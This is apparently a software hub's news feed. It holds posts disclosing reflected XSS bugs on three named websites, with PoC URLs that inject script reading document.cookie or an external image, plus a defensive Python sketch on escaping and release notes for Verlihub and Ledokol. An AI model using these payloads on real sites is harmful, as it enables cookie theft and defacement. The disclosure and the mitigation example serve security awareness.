Xakep.ru XSS bug

Vulnerable page: https://xakep.ru/

PoC
https://xakep.ru/soon/?lang="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://xakep.ru/soon/?lang="><script>alert(document.cookie)</script>

You can request any XSS code directly using the GET method and the lang parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-03-09 22:40 | 0 comments | 3 likes

Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in the search input box, or request any XSS code directly using the GET method and the q parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-02-24 22:54 | 0 comments | 4 likes

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in the search input box, or request any XSS code directly using the GET method and the search parameter.

Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Posted by RoLex on 2018-02-24 13:47 | 0 comments | 4 likes
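
Added example (not code from any of the sites or posts above): the three reports above (lang, q and search parameters) share one payload shape, a leading "> that closes a quoted attribute before new markup starts. The sketch below assumes the parameter is echoed into a double-quoted attribute; the template, the example.test URL and all function names are hypothetical, and it shows that contextual escaping or an allowlist keeps the value from creating new elements.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request, reusing the payload shape from the PoCs above.
SAMPLE_URL = 'https://example.test/soon/?lang="><script>alert(document.cookie)</script>'

# Assumed server template: the parameter lands inside a double-quoted attribute.
TEMPLATE = '<input type="hidden" name="lang" value="{value}">'

# Allowlist for a language tag such as "sv" or "pt-BR" (assumed format).
LANG_RE = re.compile(r"[A-Za-z]{2,3}(-[A-Za-z0-9]{2,8})?")


def get_param(url, name):
    """Return the first value of a query parameter, or '' if absent."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return values.get(name, [""])[0]


def render_unsafe(value):
    """The 'before' case: raw reflection, as the reports describe."""
    return TEMPLATE.format(value=value)


def render_escaped(value):
    """Attribute-context encoding: quotes and angle brackets become entities."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def validate_lang(value, default="en"):
    """Reject anything that is not a plain language tag."""
    return value if LANG_RE.fullmatch(value) else default


class TagCollector(HTMLParser):
    """Records every start tag an HTML parser sees in the output."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    payload = get_param(SAMPLE_URL, "lang")
    print("raw     :", tags_in(render_unsafe(payload)))
    print("escaped :", tags_in(render_escaped(payload)))
    print("allowed :", validate_lang(payload))
```

Counting the start tags in the rendered output works as a regression test for a template: the expected tag list should not change regardless of the parameter value.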

Verlihub 1.1.0.0

Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.1.0.0
Posted by verlihub on 2018-02-19 14:18 | 0 comments | 4 likes

Ledokol 2.9.5.70

Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP
[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP

File information: Ledokol 2.9.5.70
Posted by ledokol on 2018-02-19 13:49 | 0 comments | 4 likes